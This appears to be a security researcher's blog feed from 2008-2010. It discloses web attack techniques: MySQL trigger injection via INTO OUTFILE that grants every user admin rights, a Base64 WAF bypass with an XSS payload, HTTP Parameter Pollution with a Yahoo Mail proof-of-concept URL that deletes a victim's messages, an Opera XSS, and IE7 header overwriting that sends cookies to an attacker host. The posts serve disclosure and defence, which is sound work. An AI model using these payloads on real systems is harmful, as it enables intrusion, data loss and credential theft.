complexity is a bad dwarf when dealing with security, but what about applying Secure-SLDC, I mean, really.<br /> <br /> Just for sake of user privacy protection, I'd suggest to use different Browsers or Firefox Plugins.<br /> <ul><li>Use Chrome for your every day browsing<br /> <li>Use (at least) multiple profiles on Firefox for your favorite categories<br /> <ul><li> Firefox -P private<br /> <li> Firefox -P banking<br /> <li> Firefox -P pr0n<br /> <li> Firefox -P whatever</ul><br /> and, of course use <a href="http://noscript.net/">NoScript</a>! ;)<br /> <br /> </ul><br /> <br /> Nota Bene:<br /> I also found some site publishing Xss on facebook applications by simply searching on google...and they still work!<br /> Hey Mr. Facebook would you care doing a Google search?<br /> A hint: "facebook applications security bugs" on bigG.<br /> http://www.wisec.it/sectou.php?id=4bcf112a5085d Wed, 21 Apr 2010 16:16:00 GMT MySQL Stacked Queries with SQL Injection...sort of Security experts know that is possible to inject stacked queries on Microsoft SQL Server, when dealing with SQL Injections but not on other DBMS.<br /> <br /> In the next few lines we'll describe a new technique that could allow an attacker to insert or update data also when there is a SQL Injection on select queries.<br /> The most known attack also implemented on SQLMap is the takeover technique when the MySQL user has File Privileges and the DBMS is on the same server of the exposed web application.<br /> What to do when the DBMS host is on a different server?<br /> <br /> Something can be done by abusing <span style="font-style: italic;">Triggers</span>.<br /> MySQL supports Triggers since 5.0.2.<br /> In MySQL, Triggers are wrote as a separate file on the same directory of the Database data dir.<br /> It needs two files:<br /> <ul><li><span style="font-family:arial;">/mysql/datadir/DB/TableName.TRG</span></li><li><span style="font-family:arial;">/mysql/datadir/DB/TriggerName.TRN</span></li></ul><br /> Suppose now that a `<span style="font-style: italic;">user</span>` table exists on users DB.<br /> So run mysql client and create the following trigger:<br /> <blockquote><br /> <span style="font-family:arial;">mysql&gt; delimiter //</span><br /> <span style="font-family:arial;">mysql&gt; CREATE trigger atk after insert on user for each row</span><br /> <span style="font-family:arial;">-&gt; begin </span><br /> <span style="font-family:arial;">-&gt; update user set isadmin=1 where isadmin=0;</span><br /> <span style="font-family:arial;">-&gt; end//</span><br /> <span style="font-family:arial;">mysql&gt; delimiter ;</span><br /> </blockquote><br /> We can see that two files were created in data directory of users DB:<br /> <span style="font-style: italic;font-family:arial;" >/var/lib/mysql/users/atk.TRN</span><br /> <blockquote><br /> <span style="font-family:arial;">TYPE=TRIGGERNAME</span><br /> <span style="font-family:arial;">trigger_table=user</span><br /> </blockquote><br /> and <span style="font-style: italic;">/var/lib/mysql/users/user.TRG</span><blockquote><br /> <span style="font-family:arial;">TYPE=TRIGGERS</span><br /> <span style="font-family:arial;">triggers='CREATE DEFINER=`root`@`localhost` trigger atk after insert on user for each row\nbegin\nupdate user set isadmin=1 where isadmin=0;\nend'</span><br /> <span style="font-family:arial;">sql_modes=0</span><br /> <span style="font-family:arial;">definers='root@localhost'</span><br /> <span style="font-family:arial;">client_cs_names='latin1'</span><br /> <span style="font-family:arial;">connection_cl_names='latin1_swedish_ci'</span><br /> <span style="font-family:arial;">db_cl_names='latin1_swedish_ci'</span><br /> </blockquote><br /> <br /> What happens if we successfully write user.TRG and atk.TRN in /var/lib/mysql/users/users.TRG using INTO OUTFILE ?<br /> <blockquote><br /> <span style="font-family:arial;">AND 1=0 union select 'TYPE=TRIGGERS' into outfile</span><br /> <span style="font-family:arial;">'/var/lib/mysql/users/user.TRG' LINES TERMINATED BY '\\ntriggers=\'CREATE</span><br /> <span style="font-family:arial;">DEFINER=`root`@`localhost` trigger atk after insert on user for each row\\nbegin</span><br /> <span style="font-family:arial;">\\nupdate user set isadmin=0 where</span><br /> <span style="font-family:arial;">isadmin=1;\\nend\'sql_modes=0\ndefiners=\'root@localhost\'\nclient_cs_names=\'l</span><br /> <span style="font-family:arial;">atin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedi</span><br /> <span style="font-family:arial;">sh_ci\'\n';</span><br /> </blockquote><br /> Then do the same to create atk.TRN<br /> <blockquote><br /> <span style="font-family:arial;"> TYPE=TRIGGERNAME</span><br /> <span style="font-family:arial;"> trigger_table=user</span><br /> </blockquote><br /> MySQL will check if a TRG extension is present and will execute the trigger.<br /> So, in this scenery, after a user registration every user will be an admin... and Stored Xss like Frame Injection could be accomplished as well.<br /> Also some privilege escalation could probably be done since the DEFINER keyword says to MySQL the user on behalf the trigger should be executed.<br /> <br /> Another interesting thing about this attack is that we can try fuzzing<br /> <ul><li><span style="font-style: italic;">tabname.MYD</span></li><li><span style="font-style: italic;">tabname.MYI</span></li><li><span style="font-style: italic;">tabname.frm</span></li></ul>and of course<br /> <ul><li><span style="font-style: italic;">tabname.TRG</span></li><li><span style="font-style: italic;">triggername.TRN</span></li></ul><br /> file format and try to exploit the file format parsers.<br /> I found some crash on TRG which doesn't seem to be exploitable, but who knows..further research could result in exploitable parser errors on those file formats.<br /> http://www.wisec.it/sectou.php?id=4bced661462bd Wed, 21 Apr 2010 12:38:00 GMT Fooling B64_Encode(Payload) on WAFs and filters When dealing with Web Application Firewall, IDSs or application filters trying to block attacks there are always two big problem:<ul><li>Completeness</li><li>Correctness</li></ul>We know Regexp could be faulty, but let's suppose there's some sort of encoding in the payload which is furtherly decoded on some server side layer and then used in clear text to pass it to another layer.<br /> A good defense should be to let the WAF/Filter decode it and check for attack patterns (using regexp..).<br /> Now the question is how can I implement a decoder to get the input back in clear?<br /> Let's talk about Base64.<br /> <br /> Base64 encoding and decoding are implemented in many ways and many languages.<br /> For example PHP <span style="font-style: italic;">base64_decode</span>() is:<br /> <ul><li>Very greedy.</li><li>Goes ahead even if something goes wrong</li></ul><br /> Even some Java Implementation is kind of greedy:<br /> <span style="font-style: italic;">com.sun.org.apache.xerces.internal.impl.dv.util.Base64</span><br /> <br /> <span style="font-family:arial;"> public static byte[] decode(String paramStr</span><span style="font-family:arial;">ing)</span><span style="font-family:arial;"> </span><span style="font-family:arial;"> {</span><br /> <span style="font-family:arial;"> if (paramString == null) {</span><br /> <span style="font-family:arial;"> </span><span style="font-family:arial;">return null;<br /> </span><span style="font-family:arial;"> </span><span style="font-family:arial;">}<br /> </span><span style="font-family:arial;">char[] arrayOfChar = paramString.toCharArray();</span> <span style="font-family:arial;"><br /> int i = </span><span style="font-weight: bold;font-family:arial;" >removeWhiteSpace(arrayOfChar);</span><br /> <br /> <br /> The question is: How to rely on WAF or filters controls if they miss some behaviour?<br /> <br /> NoScript checks for Base64 encoded Xss.<br /> ModSecurity implements Base64 decoding using the following rule:<br /> <br /> <span style="font-style: italic;">SecRule ARGS:b64 "alert" "t:base64decode,log,deny,status:501"</span><br /> <br /> So the following payload is caught by both:<br /> <span style="font-style: italic;">b64_encode(</span><span style="font-weight: bold; font-style: italic;"></span><span style="font-style: italic;">"&lt;script&gt;alert(1)&lt;/script&gt;");</span><br /> <br /> <span style="font-weight: bold;">PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==</span><br /> <br /> Mod_Security:<br /> <a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_pkzXyh452W0/S87BDRmJDAI/AAAAAAAAAAk/DxcVPi92dgk/s1600/b64_modsec.jpg"><img style="margin: 0px auto 10px; display: block; cursor: pointer; width: 400px; height: 128px;" src="http://3.bp.blogspot.com/_pkzXyh452W0/S87BDRmJDAI/AAAAAAAAAAk/DxcVPi92dgk/s400/b64_modsec.jpg" alt="" id="BLOGGER_PHOTO_ID_5462515660054137858" border="0" /></a><br /> NoScript:<br /> <a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_pkzXyh452W0/S87BUPhn-bI/AAAAAAAAAAs/BLuMZfkI3Zg/s1600/b65_noscript.jpg"><img style="margin: 0px auto 10px; display: block; cursor: pointer; width: 400px; height: 92px;" src="http://4.bp.blogspot.com/_pkzXyh452W0/S87BUPhn-bI/AAAAAAAAAAs/BLuMZfkI3Zg/s400/b65_noscript.jpg" alt="" id="BLOGGER_PHOTO_ID_5462515951556098482" border="0" /></a><br /> <br /> <br /> But since the real decoder is on another layer, let's try with PHP's decoder using the illegal character '<span style="font-weight: bold;">.</span>':<br /> <br /> <span style="font-weight: bold;">P<span style="color: rgb(255, 0, 0);">.</span>HNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==</span><br /> <br /> Here's what happens:<br /> <br /> <a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_pkzXyh452W0/S87BdInE-vI/AAAAAAAAAA0/GAgng0U7RDI/s1600/b64_bypass.jpg"><img style="margin: 0px auto 10px; display: block; cursor: pointer; width: 400px; height: 148px;" src="http://1.bp.blogspot.com/_pkzXyh452W0/S87BdInE-vI/AAAAAAAAAA0/GAgng0U7RDI/s400/b64_bypass.jpg" alt="" id="BLOGGER_PHOTO_ID_5462516104318745330" border="0" /></a><br /> <br /> ModSecurity (v. 2.5.6-1) and NoScript (v. 1.9.9.61) are <span style="font-style: italic;">bypassed</span>.<br /> Same happens for other illegal character.<br /> Now NoScript is fixed (v. >= 1.9.9.62) and I expect ModSecurity to be fixed soon.<br /> <br /> The question still remains.<br /> How to rely on WAF or filters controls if they miss some behaviour?<br /> <br /> WAFs and IDSs are good for defense in depth.<br /> So don't rely too much on those.<br /> Apply SSDLC by implementing correct filters and controls and Test, Test, Test in your own environment!<br /> http://www.wisec.it/sectou.php?id=4bced57a5181b Wed, 21 Apr 2010 12:24:00 GMT HTTP Parameter Pollution FAQs We have received numerous public replies as well as several private emails.<br /> Thanks for your comments, suggestions and feedbacks.<br /> <br /> It's now time to summarize and clarify some points.<br /> <br /> <b>Q: Is this a new class of exploits or just another case of applications lacking input validation?</b><br /> <b>A:</b> Actually, HPP is an input validation flaw. As SQL Injection and XSS, we may consider it as an injection weakness.<br /> In this specific case, query string delimiters are the "dangerous" characters.<br /> <br /> <b>Q: You are saying that several HTTP back-ends manage multiple occurrences in different ways. In some cases, it may be abused in order to fingerprint the underline back-end. Is it right?</b><br /> <b>A:</b> Yes, sure. However, considering the granularity available, we don't think it is really so interesting.<br /> <b><br /> Q: This is a known attack. You guys presented a bunch of interesting but already known techniques to exploit different vulnerabilities.</b><br /> <b>A:</b> Actually, we think we have contributed (in some way) to the current state-of-art showing this issue. However, even if it is currently used by 'hard-core' attackers, it's very important to formalize a threat in order to mitigate the issue and create efficient workarounds.<br /> The aim of the entire research is to raise awareness around this problem.<br /> In future, we would like to include HPP within the OWASP Testing Guide in order to provide the right methodology for testing systems against HPP-like attacks as well.<br /> We strongly believe that sharing such knowledge may increase the security of all web applications.<br /> <br /> <b>Q: Most of your examples and findings use GET parameters. What about POST?</b><br /> <b>A:</b> POST and COOKIE parameters may be affected as well. In slide #11 and #19, we have briefly stated that and you will see further research because it is a very interesting aspect since it gives additional flexibility for all attacks.<br /> <b><br /> Q: In the current version of IE8, is the XSS Filter still vulnerable to HPP?</b><br /> <b>A:</b> No! We had a discussion with the IE XSS Filter guy at Microsoft and turns out that the current version is NOT affected. All previous tests were done against the beta release and we didn't double check the latest one. We are sorry for this misunderstanding.<br /> <br /> <b>Q: Are multiple occurrences of a parameter valid according to the RFC, W3C, whatever?</b><br /> <b>A:</b> Yes! Yes! The only thing which in fact was worth mentioning is the lack of standard in the _management_ of multiple occurrences and NOT the presence of multiple occurrences themselves.<br /> After all, that's why it is possible to abuse the query string delimiters injection flaw.<br /> <br /> <b>Q: Is Yahoo! Mail still vulnerable to HPP?</b><br /> <b>A:</b> Difficult to say. However, the specific issue was patched thus it cannot be abused by malicious users.<br /> <br /> <b>Q: Could you provide additional details regarding the Yahoo! Classic Mail HPP attack?</b><br /> <b>A:</b> I've just published <a href="http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html">here</a> an in-depth review of the issue with the video PoC as well.<br /> <br /> <b>Q: What's the right way of managing multiple occurrences? Is there a 'perfect' framework?</b><br /> <b>A:</b> No, there are no right o wrong behaviors as well as we cannot refer to a right or wrong web servers/web frameworks. The behavior of the HTTP back-ends is a matter of exploitability, only.<br /> <br /> <b>Q: HPP is only about WAFs bypasses?</b><br /> <b>A:</b> Absolutely not! HPP is also about applications flow manipulation, anti-CSRF, content pollution.<br /> <br /> <b>Q: How can I prevent HPP?</b><br /> <b>A:</b> First of all, answer yourself "Which layer am I protecting?".<br /> Then, speaking about HPP server side, it's always important to use URL encoding whenever you do GET/POST HTTP requests to an HTTP back-end.<br /> From the client-side point of view, use URL encoding whenever you are going to include user-supplied content within links, etc.<br /> <br /> <b>Q: Am I vulnerable to HPP?</b><br /> <b>A:</b> It depends on how you are managing several occurrences of the same parameter from the application point of view. Using strict input validation checkpoints and the right output filtering (URL encoding), you are likely secure (at least, against HPP :p).<br /> <br /> That's all (for now).<br /> http://www.wisec.it/sectou.php?id=4a157b35e8909 Thu, 21 May 2009 17:36:00 GMT Client side Http Parameter Pollution - Yahoo! Classic Mail Video Poc As a follow up of HTTP Parameter Pollution <a href="http://blog.mindedsecurity.com/2009/05/http-parameter-pollution-new-web-attack.html">presentation</a>,<br /> I think it's time to give some details of the Yahoo! Classic Mail exploitation.<br /> That's the long version of the video we showed @ OWASP Appsec Poland 2009:<br /> Youtube LD <a href="http://www.youtube.com/watch?v=-O1y7Zy3jfc">Video</a> or Wisec HD <a href="http://www.wisec.it/Yahoo/ClientSideHPP/ClientSideHPP.html">Video</a><br /> <br /> Moreover, in order to better clarify the details of client side HPP explitation, here's an excerpt of my mail to Yahoo! security team:<br /> "...<br /> <h4>How client side HPP works?</h4><br /> It's pretty easy, find a name value pair of HTTP parameters and append %26aaaa=aaaaa to it. Example:<br /> <blockquote><br /> <b>http://yahoo.com?par=val%26aaaa=aaa</b><br /> </blockquote><br /> Have a look at Html source looking for translation of %26 in & or &amp; in anchors or other attributes using the url, such as:<br /> <blockquote><br /> <b>&lt;a href="http://yahoo.com?par=val&aaaa=aaa"&gt; View &lt;/a&gt;</b><br /> </blockquote><br /> The semantic of such link changes from the function described to something else.<br /> In fact, if instead of %26aaaa=aaa the injected parameter were:<br /> <blockquote><br /> <b>%26action=delete</b><br /> </blockquote><br /> So, it becomes:<br /> <blockquote><br /> <b>&lt;a href="http://yahoo.com?par=val&action=delete"&gt; View &lt;/a&gt;</b><br /> </blockquote><br /> The user considers the functionality "view", even if the real action is "delete".<br /> Obviously it strongly depends on the functionalities and the structure of the Web app...<br /> <h4><br /> Yahoo! Classic Mail Issue</h4><br /> I found that client side HPP is possible on some parameter in the first page of Inbox.<br /> Example:<br /> <blockquote><br /> <b>http://it.mc257.mail.yahoo.com/mc/showFolder?fid=Inbox&order=down&tt=245&pSize=25&startMid=0</b><br /> </blockquote><br /> has startMid which could be used as entry point for client-side HPP.<br /> Infact if we try to add %26aaaa=aaa to startMid:<br /> <blockquote><br /> <b>http://it.mc257.mail.yahoo.com/mc/showFolder?fid=Inbox&order=down&tt=245&pSize=25&startMid=0%26aaaa=aaa</b><br /> </blockquote><br /> Every link to listed emails, withinin inbox, expands %26 into &amp;.<br /> Specifically:<br /> <blockquote><br /> <b>&lt;a href="http://it.mc257.mail.yahoo.com/mc/showMessage?pSize=25&sMid=0&fid=Inbox&sort=date&order=down&startMid=0&aaaaa=aaa&filterBy=&.rand=1076957714&midIndex=0&mid=1_62389_ALIKDNkAAJELSeg6IAXQeCc3b%2Fk&f=1"&gt;An email subject &lt;/a&gt;</b><br /> </blockquote><br /> (notice the &aaaa=aaa)<br /> As a result, when the user will click on an email he will trigger the execution of a different action, as it usually happens for CSRF attacks.<br /> <br /> <h4>The proof of concept</h4><br /> I just analyzed the application and found that 'cmd' parameter is used in order to execute a specific action.<br /> <br /> Later on, I found that:<br /> <b>cmd=fmgt.emptytrash<br /> </b><br /> is the action for emptying the trashcan<br /> <br /> and that:<br /> <b>DEL=1&DelFID=Inbox&cmd=fmgt.delete</b><br /> <br /> forces the application to move every msg from a folder to the trashcan and then (if possible) deletes the folder.<br /> <br /> Please note that every action has anti CSRF measures so it's not possible to perform those ones from an external evil page.<br /> <br /> Then, by combining these two commands into a link using urlencoding for the first action (delete all messages) and double urlencoding for the second action (empty the trashcan) like this:<br /> <blockquote><br /> <b>http://it.mc257.mail.yahoo.com/mc/showFolder?fid=Inbox&order=down&tt=245&pSize=25&startMid=0%2526cmd=fmgt.emptytrash%26DEL=1%26DelFID=Inbox%26cmd=fmgt.delete<br /> </b></blockquote><br /> when the user clicks on any message in order to read it and then click to "Back to messages", he will have every messages deleted forever..<br /> <br /> <h4>Countermeasures to Client Side HPP</h4><br /> When creating URLs the parameters taken from the http request itself should be url encoded and not translated to Html Entities.<br /> <br /> Example (php):<br /> <blockquote><br /> <b>&lt;a href="/?startmid="&lt;?=urlencode($_GET['startMid'])?&gt;&id=4"&gt;View&lt;/a&gt;</b><br /> </blockquote><br /> and not:<blockquote><br /> <b>&lt;a href="/?startmid="&lt;?=htmlspecialchars($_GET['startMid'])?&gt;&id=4"&gt;View&lt;/a&gt;</b><br /> </blockquote><br /> <br /> <h4>The Attack flow</h4><br /> Let&#8217;s review, once again, the attack flow<br /> <br /> Flow #1:<br /> <br /> 1. Attacker sends an email to the victim with the above link.<br /> 2. User/victim clicks on the link and gets the inbox page again.<br /> 3. User/victim clicks in order to see the other messages and gets every message deleted.<br /> <br /> <br /> Flow #2:<br /> <br /> 1. User/victim visits a malicious page<br /> 2. Attacker, after checking if the user is logged in on Yahoo!, redirects the victim on the malicious url.<br /> 3. User/victim clicks in order to see the other messages and gets every message deleted.<br /> <br /> ...<br /> <br /> Cheers,<br /> Stefano<br /> ..."<br /> <br /> Just to be clear, this vulnerability is currently patched and it affected the Yahoo! Mail classic version only.<br /> However, it is likely to force a user to change the GUI from the brand-new mail interface to the old one.<br /> http://www.wisec.it/sectou.php?id=4a155ba989240 Thu, 21 May 2009 15:41:00 GMT Http Parameter Pollution a new web attack category (not just a new buzzword :p) On May 14th @ 2009<a href="http://www.owasp.org/index.php/AppSecEU09">OWASP Appsec Poland</a>, me & <a href="http://www.ikkisoft.com/">Luca</a> <a href="http://blog.nibblesec.org/">Carettoni</a> presented a new attack category called Http Parameter Pollution (HPP).<br /> <br /> HPP attacks can be defined as the feasibility to override or add HTTP GET/POST parameters by injecting query string delimiters.<br /> It affects a building block of all web technologies thus server-side and client-side attacks exist.<br /> Exploiting HPP vulnerabilities, it may be possible to:<br /> <ul><br /> <li> Override existing hardcoded HTTP parameters.<br /> <li> Modify the application behaviors.<br /> <li> Access and, potentially exploit, uncontrollable variables.<br /> <li> Bypass input validation checkpoints and WAFs rules.<br /> </ul><br /> Just to whet your appetite, I can anticipate that by researching for real world HPP vulnerabilities, we found issues on some Google Search Appliance front-end scripts, Ask.com, Yahoo! Mail Classic and several other products.<br /> <br /> You can download the slides of the talk <a href="http://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf">here</a> (pdf) or browse it on <a href="http://www.slideshare.net/Wisec/http-parameter-pollution-a-new-category-of-web-attacks">Slideshare</a> .<br /> <br /> Also, we'll soon release a whitepaper in order to clarify all details about HPP.<br /> <br /> As last news, in a few days the video of "Yahoo! Classic Mail" exploitation of Client Side HPP will be available on this blog.<br /> So...stay tuned and bon appetit!<br /> http://www.wisec.it/sectou.php?id=4a129d3c810ec Tue, 19 May 2009 12:06:00 GMT All-In-One MultiStage Js/Html Payload I'm a bit lazy sometime. <br /> For instance, when I have to create two files in order to exploit^N^N^N^N^N^Nshow some kind of multi stage vulnerability, <br /> and I'd need to write two files, one for the Html and one for the Js.<br /> So I thought, how could I overcome with all this (incredible) effort?<br /> <br /> Let's think about my previous <a href="http://www.wisec.it/sectou.php?id=49102ef18b7f3">post</a> , when I released the Opera historysearch q=*Xss <a href="view-source:http://www.wisec.it/operahistory/">proof of concept</a>.<br /> Maybe (or maybe not) someone noticed some difference between standard Pocs and the Poc itself.<br /> <br /> It is a self contained Html/Js Poc, even if it is a two stage exploit.<br /> <br /> Let's see a simpler empty <a href="http://www.wisec.it/research/multistage/self.html">example</a>:<br /> <blockquote><br /> &lt;!--<br /> // Js payload starts here<br /> <b>JsPayload</b><br /> // Js payload ends here<br /> /* Html payload Starts here<br /> --&gt;<br /> &lt;html&gt;<br /> <b>[Html Here]</b><br /> &lt;/html&gt; <br /> &lt;!-- <br /> Html payload Ends here */ <br /> --&gt;<br /> </blockquote><br /> As it could be seen it uses comments in order to be interpreted in different contexts, the Js one when loaded by <br /> &lt;script src='self.html'&gt;&lt;/script&gt; <br /> and the Html context when loaded from the browser.<br /> <br /> The first comment is for Html:<br /> <blockquote><br /> <b><br /> &lt;!--<br /> // Js payload starts here<br /> JsPayload<br /> // Js payload ends here<br /> /* Html payload Starts here<br /> --&gt;<br /> </b><br /> </blockquote><br /> that will prevent the Html interpreter to display junk allowing to write Html in a straight forward style.<br /> <br /> The second comment is for the JavaScript one:<br /> <blockquote><br /> <b><br /> /* Html payload Starts here<br /> --&gt;<br /> &lt;html&gt;<br /> &lt;body style='background-color: rgb(220,220,220)'&gt;<br /> ...<br /> &lt;!-- <br /> Html payload Ends here */ <br /> </b><br /> </blockquote><br /> which will prevent the Js interpreter to raise an exception.<br /> It's multiple browser compliant, and it doesn't need to be a E4X browser compliant.<br /> <br /> <b>Q:</b> So...when I am supposed to use it?<br /> <b>A:</b>It could be used for milworm p0cs or instead of publishing/posting on FD/BGTQ/SEC_ML those boring multiple files.<br /> <b>Q:</b>Why are you so lazy?<br /> <b>A:</b>Hey...Too many questions.<br /> <br /> Yes, it's probably useless, but it reminds me some of those multilanguage/multiprocessor/multi_O-S shellcodes (with all due respect) that has been published on phrack.<br /> Finally, that's more an excercise in style than a real groundbreaking new way of doing POCs, but I thought it was worth posting about it.<br /> However any comments will be appreciated.<br /> http://www.wisec.it/sectou.php?id=4910a68e913f1 Tue, 04 Nov 2008 20:25:00 GMT Melomania Some days ago there has been a bit of movement in the security scene since Opera 9.61 was released.<br /> Thanks to <a href="http://www.security-assessment.com/">Roberto Suggi Liverani</a> that pointed out an <a href="http://seclists.org/fulldisclosure/2008/Oct/0394.html">issue</a> on <a href="http://www.opera.com">Opera</a> historysearch feature and to <a href="kuza55.blogspot.com/">Kuza55</a><br /> for <a href="http://seclists.org/fulldisclosure/2008/Oct/0395.html">asking</a> if the problem, initially considered as "simple" data stealing, could lead to a command execution, <br /> I started thinking about the analogies with chrome Firefox implementation.<br /> <br /> After some lazy testing, I <a href="http://seclists.org/fulldisclosure/2008/Oct/0401.html">figured out</a> that same origin iframe technique could be used in order to exploit the <br /> Xss, leveraging it to Js driven configuration change.<br /> Why? <br /> Because when dealing with opera:* features the browser, in the context of same origin policy, considered <br /> the <a href="http://en.wikipedia.org/wiki/Same_origin_policy">SOP</a> matching as follows.<br /> <br /> Since SOP matching is evaluated by comparing<br /> <blockquote><br /> <b>scheme1 + host1 + port1 == scheme2 + host2 + port2</b><br /> </blockquote><br /> We got opera:* considered as:<br /> <blockquote><br /> <b>opera + null + null</b><br /> </blockquote><br /> For every opera:* feature.<br /> <br /> So by injecting an iframe from opera:historysearch and pointing to opera:config there was a match in the SOP.<br /> <br /> That is the real issue. <br /> <br /> Well, not really, that is only one of the hypotesis that have to be satisfied in order to lead to automatic command <br /> execution.<br /> The very first and interesting issue was the <a href="http://en.wikipedia.org/wiki/Cross-site_request_forgery">CSRF</a> to opera:* location allowed using the window.open Js method<br /> from a http: scheme protocol, and that has to be credited to Roberto Suggi Liverani for finding that.<br /> <br /> The rest of the history is quite straightforward.<br /> <br /> After the issue found by Roberto I started to play a bit with the historysearch feature parameters.<br /> And it resulted in a very simple attribute-escaping-injection in the next-previous Xss.<br /> So by pointing the browser to:<br /> <blockquote><br /> <b>opera:historysearch?q="&gt;payload&p=1&s=1</b><br /> </blockquote><br /> there was the chance to exploit once again the opera:* scheme, but just if some result in the historysearch<br /> page was found.<br /> <br /> That's why the payload needs to be in the attacker evil page.<br /> <br /> The only problem was that '/' could not be used because of Opera's way of encoding/decoding them.<br /> <br /> Double urlencoding came into help. The <a href="http://seclists.org/fulldisclosure/2008/Oct/0421.html">solution</a> was using %%32f in spite of %2f. <br /> (Avif Raff's came up with '&lt;image src=x onerror=Payload' solution)<br /> <br /> And that's the full <a href="http://www.wisec.it/operahistory/">Poc</a>.<br /> <br /> So, another new "chrome" alike interface to be abused? Maybe. <br /> What is for sure is that when a browser adds new local functionalities accessible to the user, dressed as <br /> internal_scheme: with html page and internal Js methods, well, security should be taken very seriously by doing:<br /> <br /> 0. Research in the history of other browsers' flaws;<br /> 1. Risk Assessment in the design phase;<br /> 2. Threat analysis and Abuse Cases Analysis in the design phase;<br /> 3. Secure Code Review of the new features;<br /> 4. Black Box Penetration Testing.<br /> <br /> And that's where Opera missed its chance. <br /> We all hope they learnt something from their history(search). <br /> <br /> Now I can say that I'm a melomaniac again.<br /> http://www.wisec.it/sectou.php?id=49102ef18b7f3 Tue, 04 Nov 2008 11:47:00 GMT More on MSA02240108 IE7 Header Overwrite When I was researching ways exploit <a href="http://www.mindedsecurity.com/MSA02240108.html">MSA02240108 'Microsoft Internet Explorer allows overwriting of several headers leading to Http request Splitting and smuggling'</a>, one of the interesting exploits I've found is that by taking advantage of XHR redirect feature in IE7, header stealing is possible also from an attacker site.<br /> <br /> Let's see how: <br /> When dealing with a XMLHttpRequest, Internet Explorer 7 follows redirect also on external urls.<br /> Moreover, every added header is sent to the latter request as well.<br /> Infact, <br /> <code><pre><br /> var x=new XMLHttpRequest();<br /> x.open("POST","/page.html?redirect=http://anotherhost.tld");<br /> x.setRequestHeader("Blah","Blah2");<br /> x.onreadystatechange=function (){<br /> if (x.readyState == 4){<br /> alert(x.responseText)<br /> }<br /> }<br /> x.send("blah");</pre><br /> </code><br /> is executed and generates the following HTTP traffic:<br /> <br /> <code><br /> GET /page.html?redirect=http://anotherhost.tld HTTP/1.1<br /> Cookie: SomeCookie_to_ahost.tld<br /> Host: ahost.tld<br /> Blah: Blah2<br /> <br /> HTTP/1.1 302 Moved Temporarily<br /> Location: <b>http://anotherhost.tld</b><br /> Content-lenght: 0<br /> <br /> <br /> GET / HTTP/1.1<br /> Cookie: SomeCookie_to_anotherhost.tld<br /> Host: anotherhost.tld<br /> <b>Blah: Blah2 &lt;-- IE Sends it to anotherhost too!</b><br /> <br /> HTTP/1.1 200 OK<br /> ...<br /> <br /> &lt;html&gt;<br /> Body that will never be accessible from a XMLHttpRequest originating from another host.<br /> &lt;/html&gt;<br /> </code><br /> <br /> but of course x.responseText is empty.<br /> <br /> Now, let's suppose there's a victim host vhosted on the same server of an attacker site.<br /> <br /> <code><pre ><br /> var x=new XMLHttpRequest();<br /> x.open("POST","/index.html");<br /> x.setRequestHeader("Host"+String.fromCharCode(223),"http://at.tacker.com");<br /> x.setRequestHeader("Connection","keep-alive");<br /> x.onreadystatechange=function (){<br /> if (x.readyState == 4){<br /> }<br /> }<br /> x.send("blah");</pre><br /> </code><br /> <br /> where index.html simply redirect with:<br /> <br /> <code><br /> HTTP/1.1 302 Moved Temporarily<br /> Location: <b>http://vi.ct.im/victimpage.html</b><br /> </code><br /> <br /> The overwritten Host header will still be there on the redirected request because IE7 considers it as an additional header, but every other header will be as if the request is to vi.ct.im host.<br /> <br /> <code><br /> GET /victimpage.html HTTP/1.1<br /> <b>Host: at.tacker.com<br /> Cookie: some_cookie_that_should_be_sent_to_vi.ct.im<br /> Header1: some_value1_that_should_be_sent_to_vi.ct.im<br /> Header2: some_value2_that_should_be_sent_to_vi.ct.im<br /> Header3: some_value3_that_should_be_sent_to_vi.ct.im<br /> </b><br /> </code><br /> Which will be sent to the server. The server sees the Host: at.tacker.com header and sends the whole request to it, letting the cookie and other sensitive data in headers, to be directly stealed by at.ttacker.com.<br /> <br /> Now my question is:<br /> Why following a redirect to external hosts since the response could not be get from javascript, because of <br /> Same Origin Policy?<br /> ...<br /> Just to introduce some other potential security issue?<br /> http://www.wisec.it/sectou.php?id=47e40aa3cc7db Fri, 21 Mar 2008 19:59:00 GMT The first release of SWFIntruder is out!! I am proud to announce first release of <b><a href="https://www.owasp.org/index.php/Category:SWFIntruder">SWFIntruder</a></b>.<br /> <b>SWFIntruder</b> (pronounced <i>Swiff Intruder</i>) is the first tool specifically developed for analyzing and testing security of Flash applications at runtime.<br /> It helps to find flaws in Flash applications using the methodology originally described in <a href="http://www.owasp.org/images/8/8c/OWASPAppSec2007Milan_TestingFlashApplications.ppt">Testing Flash Applications</a> and in <a href="http://www.owasp.org/images/d/d8/OWASP-WASCAppSec2007SanJose_FindingVulnsinFlashApps.ppt">Finding Vulnerabilities in Flash Applications</a>.<br /> <br /> Some neat feature:<br /> <blockquote><i><br /> * Basic predefined attack patterns.<br /> * Highly customizable attacks.<br /> * Highly customizable undefined variables.<br /> * Semi automated Xss check.<br /> * User configurable internal parameters.<br /> * Log Window for debugging and tracking.<br /> * History of latest 5 tested SWF files.<br /> * ActionScript Objects runtime explorer in tree view.<br /> * Persistent Configuration and Layout.</i><br /> </blockquote><br /> SWFIntruder is <a href="https://www.owasp.org/index.php/Category:SWFIntruder">hosted</a> @ <a href="http://www.owasp.org">OWASP</a> and is sponsored by <a href="http://www.mindedsecurity.com">Minded Security</a>.<br /> <br /> Check it out and let me know!<br /> Any comments will be appreciated.<br /> http://www.wisec.it/sectou.php?id=47557e2774237 Tue, 04 Dec 2007 17:10:00 GMT Finding Vulnerabilities in Flash Applications - Slides @ Owasp Finally the <a href="http://www.owasp.org/images/d/d8/OWASP-WASCAppSec2007SanJose_FindingVulnsinFlashApps.ppt"> slides</a> of my presentation @ <a href="http://www.webappsec.org"> WASC</a> &amp; <a href="http://www.owasp.org"> OWASP</a> <a href="http://www.owasp.org/index.php/7th_OWASP_AppSec_Conference_-_San_Jose_2007/Agenda"> AppSec 2007</a> are available for everyone is interested on this 